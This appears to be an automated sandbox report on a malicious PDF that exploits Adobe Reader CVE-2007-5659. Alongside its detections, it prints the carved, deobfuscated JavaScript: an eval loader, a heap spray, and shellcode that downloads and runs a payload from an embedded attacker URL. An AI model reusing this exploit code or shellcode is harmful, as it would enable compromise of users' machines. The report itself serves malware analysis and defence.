PDF malware analysis — malicious · 605ce83880599fb5

MALICIOUS

PDF

11.9 KB

MD5: effb9f89569b0bf299de9a75503ca2f0 SHA-1: fbc248f66d233fd464acd84aca12c5ab3107eba5 SHA-256: 605ce83880599fb553c702d954360fcfb32f454f36cf6805edd0e3584dcade79

338 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF contains JavaScript that exploits CVE-2007-5659, specifically targeting Adobe Reader versions within a certain patch range. The script is designed to download and execute a payload from the embedded URL http://jabaqgyjthr.com/nte/prox.py/eH57a1b3ebV0100f060006R83c4b01e102T9976b026203l000c. The ML classifier and ClamAV detection strongly indicate malicious intent.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 11

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
JavaScript action low 3 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE

PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
ClamAV: Pdf.Exploit.Agent-36063 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Pdf.Exploit.Agent-36063
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY

Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER

PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN

PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (matched in decompressed stream)
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://jabaqgyjthr.com/nte/prox.py/eH57a1b3ebV0100f060006R83c4b01e102T9976b026203l000c Referenced by PDF JavaScript

Extracted artifacts 5

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0007_000.js` `eb39e2de4dbbc100de6d3e30aa43ff78fa075618862ba1ebba5151ea3a3b848d`	pdf-javascript-stream	PDF /JS object 7 at offset 0x19D	273 bytes
Preview script First 1,000 lines of the extracted script if (1) {var z; var y; z = y = app.doc; y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, 'a%b'.replace(/[ab]/g, ''));var th = event.target; s = th['unes' + 'cape'] (l) ;var e = app['ev' + 'al']; e(s);}
`generic_stage_recovery_000.js` `41323bb0bc5d6e8e4f59ad32a6e5f405b8b479252ecf9b61a0159542b2003e8e`	deobfuscated-js	generic stage recovery split-literal-normalize from JavaScript object 7 at offset 0x19D	263 bytes
Preview script First 1,000 lines of the extracted script if (1) {var z; var y; z = y = app.doc; y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, 'a%b'.replace(/[ab]/g, ''));var th = event.target; s = th['unescape'] (l) ;var e = app['eval']; e(s);}
`annotation_subject_callee_hex_stage_000.js` `665808d82c9957557cb87f3bb91cd532bb5bd3c663e9445ad64c5ef40272efcc`	deobfuscated-js	annotation-subject callee-key decoded JavaScript at offset 0x14A	5049 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var FL_7457QjpxI4l = new Array();var J5fYgqu7 = 0;var XpH_TmaKP0F1cp = "";function qb_3_mds1y(IT_bj_0TYOT3, wN4Ald_4){var r62_L2470e6 = wN4Ald_4.toString();var C_0407 = "";for(var ud___a23_V_c = 0; ud___a23_V_c < r62_L2470e6.length; ud___a23_V_c++) {var eK1o8U_c____tO = parseInt(r62_L2470e6.substr(ud___a23_V_c, 1));if (!isNaN(eK1o8U_c____tO)) {eK1o8U_c____tO = eK1o8U_c____tO.toString(16);if (eK1o8U_c____tO.length == 1) { eK1o8U_c____tO = "0" + eK1o8U_c____tO; }else if (eK1o8U_c____tO.length != 2) { eK1o8U_c____tO = "00"; }C_0407 = eK1o8U_c____tO + C_0407;}}while(C_0407.length < 8) { C_0407 = "0" + C_0407; }var vi6___A = IT_bj_0TYOT3.toString(16);if (vi6___A.length == 1) { vi6___A = "0" + vi6___A; }else if (vi6___A.length != 2) { vi6___A = "00"; }C_0407 = "3" + vi6___A + "P" + C_0407;return C_0407;}function lyOq88Kk(e5B_8e3q__pt0YQ, q78s10GBs_26Nd8){var tB3D__1 = new Array("");var ib_pp2kv = e5B_8e3q__pt0YQ;var FO77__R_Q8C;if ((FO77__R_Q8C = e5B_8e3q__pt0YQ.lastIndexOf("%u00")) != -1) {if (FO77__R_Q8C + 6 == e5B_8e3q__pt0YQ.length) {tB3D__1[0] = e5B_8e3q__pt0YQ.substr(FO77__R_Q8C + 4, 2);ib_pp2kv = e5B_8e3q__pt0YQ.substring(0, FO77__R_Q8C);}}FO77__R_Q8C = 1;for (ud___a23_V_c = 0; ud___a23_V_c < q78s10GBs_26Nd8.length; ud___a23_V_c++) {var Ac___K6___Or31 = q78s10GBs_26Nd8.charCodeAt(ud___a23_V_c).toString(16);if (Ac___K6___Or31.length == 1) { Ac___K6___Or31 = "0" + Ac___K6___Or31; }tB3D__1[FO77__R_Q8C] = Ac___K6___Or31;FO77__R_Q8C++;}ud___a23_V_c = tB3D__1[0].length ? 0 : 1;tB3D__1[FO77__R_Q8C] = "00";tB3D__1[FO77__R_Q8C + 1] = "00";FO77__R_Q8C += 2;if ((tB3D__1.length - ud___a23_V_c) % 2) {tB3D__1[FO77__R_Q8C] = "00";}while(ud___a23_V_c < tB3D__1.length) {ib_pp2kv += "%u" + tB3D__1[ud___a23_V_c + 1] + tB3D__1[ud___a23_V_c];ud___a23_V_c += 2;}ib_pp2kv += "%u0000";return ib_pp2kv;}function h61_h0r_7__d(S1u__N_Y, kr0ks5__15h_6r){while (S1u__N_Y.length2<kr0ks5__15h_6r) {S1u__N_Y += S1u__N_Y;}S1u__N_Y = S1u__N_Y.substring(0,kr0ks5__15h_6r/2);return S1u__N_Y;}function w___C0sh5(UCIrxH6E__5m, vsW_4__7i, AB2cxc_Or_Ah){var Jy707YA = 0x0c0c0c0c;var S1u__N_Y = unescape(vsW_4__7i);var q78s10GBs_26Nd8 = qb_3_mds1y(UCIrxH6E__5m, AB2cxc_Or_Ah);var kkFx__Wj46 = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var e5B_8e3q__pt0YQ = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u15e9%u0001%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u00a9%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0093%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u10ec%u0001%u8b00%u83dc%u0cc3%u5251%u6853%u0104%u0000%u56ff%u5a0c%u5159%u8b52%u5302%u8043%u003b%ufa75%u7b81%u2efc%u6c64%u756c%u8303%u08eb%u0389%u43c7%u2e04%u6c64%uc66c%u0843%u5b00%uc18a%u3004%u4588%u3300%u50c0%u5350%u5057%u56ff%u8310%u00f8%u1d75%u016a%ueb83%uc70c%u7203%u6765%uc773%u0443%u7276%u3233%u43c7%u2008%u732d%u5320%u56ff%u5a04%u8359%u04c2%u8041%u003a%u9d75%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%ue6e8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6670%u614c%u0042%u7468%u7074%u2f3a%u6a2f%u6261%u7161%u7967%u746a%u7268%u632e%u6d6f%u6e2f%u6574%u702f%u6f72%u2e78%u7970%u652f%u3548%u6137%u6231%u6533%u5662%u3130%u3030%u3066%u3036%u3030%u5236%u3338%u3463%u3062%u6531%u3031%u5432%u3939%u3637%u3062%u3632%u3032%u6c33%u3030%u6330";app.y_yO__n_Ql_4QMh = unescape(lyOq88Kk(e5B_8e3q__pt0YQ, q78s10GBs_26Nd8));var C0W7Y254cr57 = 0x400000;var CXFH8yT5L3_uP = kkFx__Wj46.length 2;var kr0ks5__15h_6r = C0W7Y254cr57 - (CXFH8yT5L3_uP+0x38);S1u__N_Y = h61_h0r_7__d(S1u__N_Y, kr0ks5__15h_6r);var nc2VhQj = (Jy707YA - 0x400000)/C0W7Y254cr57;for (var rRt__n_Em__34Q = 0; rRt__n_Em__34Q < nc2VhQj; rRt__n_Em__34Q++) {FL_7457QjpxI4l[rRt__n_Em__34Q] = S1u__N_Y + kkFx__Wj46; ... (truncated)
`legacy_pdfkit_stage_001.js` `45de8888455fcb022f42a086a781392676f3153cbb526f7b798447c239212de3`	deobfuscated-js	repeated-marker hex decoded JavaScript at offset 0x2D6	12110 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script function s___F_0_t4_6CWt(M03l__S_r, Tt2_ub){var J1a_M_2 = arguments["c" + "azzee".replace(/zz/, 'll')];J1a_M_2 = J1a_M_2["t" + "oS" + "tr" + "ing"]();var Ks5_2L41SUabb = 0;try {if (app) {Ks5_2L41SUabb++;Ks5_2L41SUabb++;}} catch(e) { }var xV_s__Mi__eg = new Array();if (M03l__S_r) { xV_s__Mi__eg = M03l__S_r;} else {var C_K3CtXar = 0;var A_5k3_TYA = 0;var oR7WD4_vO4M_8l = 512;var r4PkD17S_AL8 = 52;r4PkD17S_AL8 = r4PkD17S_AL8 - 4;var C_X7R2c2T8 = r4PkD17S_AL8 + 9;while(A_5k3_TYA < J1a_M_2.length) {var lInCqas0kq2d_2 = 1;var iF_H1LB_Sl = J1a_M_2['c' + 'harCodeAt'](A_5k3_TYA);if (iF_H1LB_Sl <= C_X7R2c2T8 && iF_H1LB_Sl >= r4PkD17S_AL8) {if (C_K3CtXar == 4) { C_K3CtXar = 0; }if (isNaN(xV_s__Mi__eg[C_K3CtXar])) {xV_s__Mi__eg[C_K3CtXar] = 0;}xV_s__Mi__eg[C_K3CtXar] += iF_H1LB_Sl;if (xV_s__Mi__eg[C_K3CtXar] > 512) {xV_s__Mi__eg[C_K3CtXar] -= oR7WD4_vO4M_8l;}C_K3CtXar++;}A_5k3_TYA++;}}C_K3CtXar = 4;for (var N_kj0n__728 = 0; N_kj0n__728 < 4; N_kj0n__728++) {if (xV_s__Mi__eg[N_kj0n__728] > 256) {xV_s__Mi__eg[N_kj0n__728] -= 256;}}var Q_8_N_3jal6kdFu = 0;var l116A6_5es_4Fx3 = "";var xSe50J52IO7Pw = 0;var Hth8__3q = 0;var aW_m57Es;var i8nO_TI82kn = 0;while(xSe50J52IO7Pw < Tt2_ub.length) {var L6x0RY = Tt2_ub.substr(xSe50J52IO7Pw, 1) + "Z";var dQb___L_13e3h = parseInt(L6x0RY, 16);if (Hth8__3q) {aW_m57Es += dQb___L_13e3h;if (Q_8_N_3jal6kdFu == 4) {Q_8_N_3jal6kdFu -= 4;}var c_3Rp_57O7iE = aW_m57Es;c_3Rp_57O7iE = c_3Rp_57O7iE - (i8nO_TI82kn + 2) * xV_s__Mi__eg[Q_8_N_3jal6kdFu];if (c_3Rp_57O7iE < 0) {c_3Rp_57O7iE = c_3Rp_57O7iE - Math.floor(c_3Rp_57O7iE / 256) * 256;}c_3Rp_57O7iE = String.fromCharCode(c_3Rp_57O7iE);if (Ks5_2L41SUabb == 2) {l116A6_5es_4Fx3 += c_3Rp_57O7iE;} else if (Ks5_2L41SUabb == 1) {l116A6_5es_4Fx3 += dQb___L_13e3h;} else {l116A6_5es_4Fx3 += xSe50J52IO7Pw;}Q_8_N_3jal6kdFu++;Hth8__3q = 0;i8nO_TI82kn++;} else {Hth8__3q = 1;aW_m57Es = dQb___L_13e3h * 16;}xSe50J52IO7Pw++;};var abcd=0; ;var E_2D_X__0i = this;E_2D_X__0i['ev'+'al'](l116A6_5es_4Fx3);} s___F_0_t4_6CWt(0, "74C236D640D9E7E52AEE83F75C5588E7227DF4D30AABFD0506AACEF8430E48A7193745E8FA37DDD42F80DDDB09656D7EFEAC6AB73CBD10BE0E28D0B32340906E045267A6DA8AE850D8B4F29B2008C4871D3F34870C5C0B6D138D0F371B7DA952FDE38E55CA01413DEA0CD8060953A41FFA95930AB3D86E2FF8A92EFCB414CCF0B218741BB02D45CEED8700E7DEC9EFD29C05C3E9DE2F81FCCD1105C1D876129EA1A094AA8AA448AB76BB0EA1B8342286C452E676BF8197ADA5AA2E79A1CB1FA15EDEA46675EDBD9295586B8764582F748DB4B4524AEF8E4085F54E3A590545344C6D096481A1D02936CE904571E4511041100A356D08A3F72684B227745565092FD0FC0B59F0E70D5518C0F51222300E4F8347FB33AB0CB6589F8EE52EC754B50E261AA44D620AE14A8B94DB36A48FBD2FA327B520FC1B7AE6FAA56FFD5EA65EE6426DA908AE16561BC4BD95EAFAAF810D3073751E4C0137C6A40151D3C49853FDE48355F90C5C3DB616CC4BDD36DF16E3909735E9BC5742D5B73035D529F227EC486CE7B0364317DC59F40BBD96FFD6C3F0B7F5C91C7702B51748EBD07C14E67E7EA1968B9648E976FE3797C1FD05BDB150D3B5A991876E83691E766495EB5EA3ECB5A57222A79195586B85A6740B3EABB600898F9DC17446D18151534418537D640355798CDC3D44C5915479F958FE2FEED40833FDF3EE6B546D353A8A5F215DC023156EDCA8EB16DB7CD61420301B317004CA1A74B8CB06CEA7B751CD75DD412043D53961F78E0139AFC50279609509EE71CD320624B3EE0CDB76F625776C2A86729D2EB5E86AD6B1B5462DC5937DDE05444DCA3AF830D64BBC31C298BF2ED2B15B31BA2A5E4F08F9224FC864CF3DCF5171F6D3B15730F0E8EC1ADB04D4F1AC55B309EE7F711CDD61FDDC9BA0F9048EB9CAFFA01C77EDA71748EBD07C14E67E7EA1968B9648E9760F559CB1240F9F6E2E94787A3F587966BF657CA1D41F7F79C1019BA640AD4E9F5F2C4EA88E067D8DB0D54496E2C6759A113C275FF512273E7CC46C8363C74D759A4C2332A7200E30ECD4534D3CA80236405C03225733E01E8CE42C63C3E70D55FA6CD1120760C00E3CF4D9496DCCBE1DA4CEEB560A92ECFE0443A60E1DDFA9537FE1D435B999CD3C9160CF190EF0861134A4ABF7379F762354759519BD3C5E0FCAB84623DC8891DF015B581D5C0A44F48DD42F1DCBC170BEF56629DE0C471FB616CC54F77C901F00A3954FB27F1AF7C1FF1D38A21EE21DEE517621F02D45CEDB6E0E05AACAC30FCDF0C40A9A1669C9DC4A4EA6A864D7B5BDA0B6D5ABA56BA9BFFF0C8E7A0BFF958550D3A8A96E709166861CAB77B71F76A3D4F595993DBC5E8F4A3A92939844679CB5F98E79E380304B1E4C3644FE091E3F3EC4234B5688697FBF4C0E58D427156D1006355B15BBEE312972E63F72202333A323EE5FC0F90D5529C0D64B363E0A537F3B0A5266B8095A ... (truncated)
`deobfuscated.js` `9f99e7e3520f15475edaac0177a1b408af1b4da3dddc0d09ceefef23c48e2dba`	deobfuscated-js	PDF JavaScript deobfuscation pass	70708 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script if (1) {var z; var y; z = y = app.doc; y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, 'a%b'.replace(/[ab]/g, ''));var th = event.target; s = th['unes' + 'cape'] (l) ;var e = app.eval; e(s);} z0dz0az0dz0az09z66z75z6ez63z74z69z6fz6ez20z73z5fz5fz5fz46z5fz30z5fz74z34z5fz36z43z57z74z28z4dz30z33z6cz5fz5fz53z5fz72z2cz20z54z74z32z5fz75z62z29z7bz76z61z72z20z4az31z61z5fz4dz5fz32z20z3dz20z61z72z67z75z6dz65z6ez74z73z5bz22z63z22z20z2bz20z22z61z7az7az65z65z22z2ez72z65z70z6cz61z63z65z28z2fz7az7az2fz2cz20z27z6cz6cz27z29z5dz3bz4az31z61z5fz4dz5fz32z20z3dz20z4az31z61z5fz4dz5fz32z5bz22z74z22z20z2bz20z22z6fz53z22z20z2bz20z22z74z72z22z20z2bz20z22z69z6ez67z22z5dz28z29z3bz76z61z72z20z4bz73z35z5fz32z4cz34z31z53z55z61z62z62z20z3dz20z30z3bz74z72z79z20z7bz69z66z20z28z61z70z70z29z20z7bz4bz73z35z5fz32z4cz34z31z53z55z61z62z62z2bz2bz3bz4bz73z35z5fz32z4cz34z31z53z55z61z62z62z2bz2bz3bz7dz7dz20z63z61z74z63z68z28z65z29z20z7bz20z7dz76z61z72z20z78z56z5fz73z5fz5fz4dz69z5fz5fz65z67z20z3dz20z6ez65z77z20z41z72z72z61z79z28z29z3bz69z66z20z28z4dz30z33z6cz5fz5fz53z5fz72z29z20z7bz20z78z56z5fz73z5fz5fz4dz69z5fz5fz65z67z20z3dz20z4dz30z33z6cz5fz5fz53z5fz72z3bz7dz20z65z6cz73z65z20z7bz76z61z72z20z43z5fz4bz33z43z74z58z61z72z20z3dz20z30z3bz76z61z72z20z41z5fz35z6bz33z5fz54z59z41z20z3dz20z30z3bz76z61z72z20z6fz52z37z57z44z34z5fz76z4fz34z4dz5fz38z6cz20z3dz20z35z31z32z3bz76z61z72z20z72z34z50z6bz44z31z37z53z5fz41z4cz38z20z3dz20z35z32z3bz72z34z50z6bz44z31z37z53z5fz41z4cz38z20z3dz20z72z34z50z6bz44z31z37z53z5fz41z4cz38z20z2dz20z34z3bz76z61z72z20z43z5fz58z37z52z32z63z32z54z38z20z3dz20z72z34z50z6bz44z31z37z53z5fz41z4cz38z20z2bz20z39z3bz77z68z69z6cz65z28z41z5fz35z6bz33z5fz54z59z41z20z3cz20z4az31z61z5fz4dz5fz32z2ez6cz65z6ez67z74z68z29z20z7bz76z61z72z20z6cz49z6ez43z71z61z73z30z6bz71z32z64z5fz32z20z3dz20z31z3bz76z61z72z20z69z46z5fz48z31z4cz42z5fz53z6cz20z3dz20z4az31z61z5fz4dz5fz32z5bz27z63z27z20z2bz20z27z68z61z72z43z6fz64z65z41z74z27z5dz28z41z5fz35z6bz33z5fz54z59z41z29z3bz69z66z20z28z69z46z5fz48z31z4cz42z5fz53z6cz20z3cz3dz20z43z5fz58z37z52z32z63z32z54z38z20z26z26z20z69z46z5fz48z31z4cz42z5fz53z6cz20z3ez3dz20z72z34z50z6bz44z31z37z53z5fz41z4cz38z29z20z7bz69z66z20z28z43z5fz4bz33z43z74z58z61z72z20z3dz3dz20z34z29z20z7bz20z43z5fz4bz33z43z74z58z61z72z20z3dz20z30z3bz20z7dz69z66z20z28z69z73z4ez61z4ez28z78z56z5fz73z5fz5fz4dz69z5fz5fz65z67z5bz43z5fz4bz33z43z74z58z61z72z5dz29z29z20z7bz78z56z5fz73z5fz5fz4dz69z5fz5fz65z67z5bz43z5fz4bz33z43z74z58z61z72z5dz20z3dz20z30z3bz7dz78z56z5fz73z5fz5fz4dz69z5fz5fz65z67z5bz43z5fz4bz33z43z74z58z61z72z5dz20z2bz3dz20z69z46z5fz48z31z4cz42z5fz53z6cz3bz69z66z20z28z78z56z5fz73z5fz5fz4dz69z5fz5fz65z67z5bz43z5fz4bz33z43z74z58z61z72z5dz20z3ez20z35z31z32z29z20z7bz78z56z5fz73z5fz5fz4dz69z5fz5fz65z67z5bz43z5fz4bz33z43z74z58z61z72z5dz20z2dz3dz20z6fz52z37z57z44z34z5fz76z4fz34z4dz5fz38z6cz3bz7dz43z5fz4bz33z43z74z58z61z72z2bz2bz3bz7dz41z5fz35z6bz33z5fz54z59z41z2bz2bz3bz7dz7dz43z5fz4bz33z43z74z58z61z72z20z3dz20z34z3bz66z6fz72z20z28z76z61z72z20z4ez5fz6bz6az30z6ez5fz5fz37z32z38z20z3dz20z30z3bz20z4ez5fz6bz6az30z6ez5fz5fz37z32z38z20z3cz20z34z3bz20z4ez5fz6bz6az30z6ez5fz5fz37z32z38z2bz2bz29z20z7bz69z66z20z28z78z56z5fz73z5fz5fz4dz69z5fz5fz65z67z5bz4ez5fz6bz6az30z6ez5fz5fz37z32z38z5dz20z3ez20z32z35z36z29z20z7bz78z56z5fz73z5fz5fz4dz69z5fz5fz65z67z5bz4ez5fz6bz6az30z6ez5fz5fz37z32z38z5dz20z2dz3dz20z32z35z36z3bz7dz7dz76z61z72z20z51z5fz38z5fz4ez5fz33z6az61z6cz36z6bz64z46z75z20z3dz20z30z3bz76z61z72z20z6cz31z31z36z41z36z5fz35z65z73z5fz34z46z78z33z20z3dz20z22z22z3bz76z61z72z20z78z53z65z35z30z4az35z32z49z4fz37z50z77z20z3dz20z30z3bz76z61z72z20z48z74z68z38z5fz5fz33z71z20z3dz20z30z3bz76z61z72z20z61z57z5fz6dz35z37z45z73z3bz76z61z72z20z69z38z6ez4fz5fz54z49z38z32z6bz6ez20z3dz20z30z3bz77z68z69z6cz65z28z78z53z65z35z30z4az35z32z49z4fz37z50z77z20z3cz20z54z74z32z5fz75z62z2ez6cz65z6ez67z74z68z29z20z7bz76z61z72z20z4cz36z78z30z52z59z20z3dz20z54z74z32z5fz75z62z2ez73z75z62z73z74z72z28z78z53z65z35z30z4az35z32z49z4fz37z50z77z2cz20z31z29z20z2bz20z22z5az22z3bz76z61z72z20z64z51z62z5fz5fz5fz4cz5fz31z33z65z33z68z20z3dz20z70z61z72z73z65z49z6ez74z28z4 ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.